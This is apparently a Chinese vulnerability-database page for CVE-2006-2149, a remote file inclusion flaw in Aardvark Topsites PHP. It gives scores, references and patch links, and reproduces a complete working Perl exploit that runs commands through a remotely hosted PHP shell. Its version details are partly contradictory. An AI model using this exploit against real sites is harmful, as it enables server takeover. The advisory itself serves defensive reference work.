CVE-2006-2149
CVSS6.4
发布时间 :2006-05-03 06:02:00
修订时间 :2011-03-07 21:35:26
NMCOES    

[原文]PHP remote file inclusion vulnerability in sources/lostpw.php in Aardvark Topsites PHP 4.2.2 and earlier, when register_globals is enabled, allows remote attackers to execute arbitrary PHP code via the CONFIG[path] parameter, as demonstrated by including a GIF that contains PHP code.


[CNNVD]Aardvark Topsites PHP LostPW.PHP 远程文件包含漏洞(CNNVD-200605-043)

        Aardvark Topsites PHP 4.2.2及之前版本的sources/lostpw.php存在PHP远程文件包含漏洞。当启用register_globals时,远程攻击者可以借助CONFIG[path]参数执行任意PHP代码,比如包含含有PHP代码的GIF。

- CVSS (基础分值)

CVSS分值: 6.4 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2149
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2149
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-043
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/1587
(UNKNOWN)  VUPEN  ADV-2006-1587
http://secunia.com/advisories/19911
(VENDOR_ADVISORY)  SECUNIA  19911
http://milw0rm.com/exploits/1732
(UNKNOWN)  MILW0RM  1732
http://xforce.iss.net/xforce/xfdb/26189
(UNKNOWN)  XF  aardvark-lostpw-join-file-include(26189)
http://www.securityfocus.com/bid/17940
(UNKNOWN)  BID  17940
http://www.osvdb.org/25158
(UNKNOWN)  OSVDB  25158

- 漏洞信息

Aardvark Topsites PHP LostPW.PHP 远程文件包含漏洞
中危 输入验证
2006-05-03 00:00:00 2006-05-03 00:00:00
远程  
        Aardvark Topsites PHP 4.2.2及之前版本的sources/lostpw.php存在PHP远程文件包含漏洞。当启用register_globals时,远程攻击者可以借助CONFIG[path]参数执行任意PHP代码,比如包含含有PHP代码的GIF。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        Aardvark Topsites PHP Aardvark Topsites PHP 4.1
        Aardvark Topsites PHP atsphp-5.0.3
        http://www.aardvarkind.com/download.php?id=atsphp-5.0.3&f=zip
        Aardvark Topsites PHP Aardvark Topsites PHP 4.1.1
        Aardvark Topsites PHP atsphp-5.0.3
        http://www.aardvarkind.com/download.php?id=atsphp-5.0.3&f=zip
        Aardvark Topsites PHP Aardvark Topsites PHP 4.2.2
        Aardvark Topsites PHP atsphp-5.0.3
        http://www.aardvarkind.com/download.php?id=atsphp-5.0.3&f=zip

- 漏洞信息 (1732)

Aardvark Topsites PHP <= 4.2.2 (lostpw.php) Remote Include Exploit (EDBID:1732)
php webapps
2006-04-30 Verified
0 cijfer
N/A [点击下载]
#!/usr/bin/perl
#
# Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit
#
# Copyright (c) 2006 cijfer <cijfer@netti!fi>
# All rights reserved.
#
# never ctrl+c again.
# cijfer$ http://target.com/dir
# host changed to 'http://target.com/dir'
# cijfer$ 
#
# to set your PHP shell location:
# cijfer$ shell=http://my.shell.fi/phpshell.gif?&cmd=
# php shell set to 'http://my.shell.fi/phpshell.gif?&cmd='
# cijfer$
#
# $Id: cijfer-atpxpl.pl,v 0.1 2006/04/30 02:11:00 cijfer Exp $

use strict;
use LWP::UserAgent;
use URI::Escape;
use Getopt::Long;
use Term::ANSIColor;

my($command,$verbose,$proxy,$shell,$host,$res);

$res = GetOptions("host=s" => \$host, "proxy=s" => \$proxy, "verbose+" => \$verbose);
&usage unless $host;

while()
{
	print color("green"), "cijfer\# ", color("reset");
	chomp($command = <STDIN>);
	exit unless $command;
	if($command =~ m/^http:\/\/(.*)/g)
	{
		$host="http://".$1;
		print "host changed to '";
		print color("bold"), $host."'\n", color("reset");
	}
	elsif($command =~ m/^shell=http:\/\/(.*)/g)
	{
		$shell="http://".$1;
		print "php shell set to '";
		print color("bold"), $shell."'\n", color("reset");
	}
	else
	{
		&exploit($command,$host);
	}
}

sub usage
{
	print "Aardvark Topsites PHP <=4.2.2 Remote Command Execution Exploit\n";
	print "usage: $0 -hpv\n\n";
	print "  -h, --host\t\tfull address of target (ex. http://www.website.com/directory)\n";
	print "  -p, --proxy\t\tprovide an HTTP proxy (ex. 0.0.0.0:8080)\n";
	print "  -v, --verbose\t\tverbose mode (debug)\n\n";
	exit;
}

sub exploit
{
	my($command,$host) = @_;
	my($string,$execut,$recv,$sent,$out,$cij,@cij);

	$cij=LWP::UserAgent->new() or die;
	$cij->agent("Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:2.0) Gecko/20060101");
	$cij->proxy("http", "http://".$proxy."/") unless !$proxy;

	$string  = "%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F%3B%20";
	$string .= uri_escape(shift);
	$string .= "%3B%20%65%63%68%6F%20%5F%63%69%6A%66%65%72%5F";

	$out=$cij->get($host."/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=".$shell.$string);

	if($out->is_success)
	{
		@cij=split("_cijfer_",$out->content);
		print substr(@cij[1],1);
	}

	if($verbose)
	{
		$recv=length $out->content;
		print "Total received bytes: ".$recv."\n";
		$sent=length $command;
		print "Total sent bytes: ".$sent."\n";
	}
}

# milw0rm.com [2006-04-30]
		

- 漏洞信息

25158
Aardvark Topsites PHP sources/lostpw.php CONFIG[path] Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Aardvark Topsites PHP contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to sources/lostpw.php not properly sanitizing user input supplied to the 'CONFIG[path]' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

- 时间线

2006-04-30 Unknow
2006-04-30 Unknow

- 解决方案

Upgrade to version 5.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Aardvark Topsites PHP LostPW.PHP Remote File Include Vulnerability
Input Validation Error 17940
Yes No
2006-04-30 12:00:00 2006-05-15 06:09:00
cijfer is credited with the discovery of this vulnerability.

- 受影响的程序版本

Aardvark Topsites PHP Aardvark Topsites PHP 4.2.2
Aardvark Topsites PHP Aardvark Topsites PHP 4.1.1
Aardvark Topsites PHP Aardvark Topsites PHP 4.1
Aardvark Topsites PHP Aardvark Topsites PHP 5.0.3

- 不受影响的程序版本

Aardvark Topsites PHP Aardvark Topsites PHP 5.0.3

- 漏洞讨论

Aardvark Topsites PHP is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

- 漏洞利用

This issue can be exploited through a web client.

The following exploit is available:

- 解决方案

The vendor has addressed this issue in version 5.0.3.


Aardvark Topsites PHP Aardvark Topsites PHP 4.1

Aardvark Topsites PHP Aardvark Topsites PHP 4.1.1

Aardvark Topsites PHP Aardvark Topsites PHP 4.2.2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站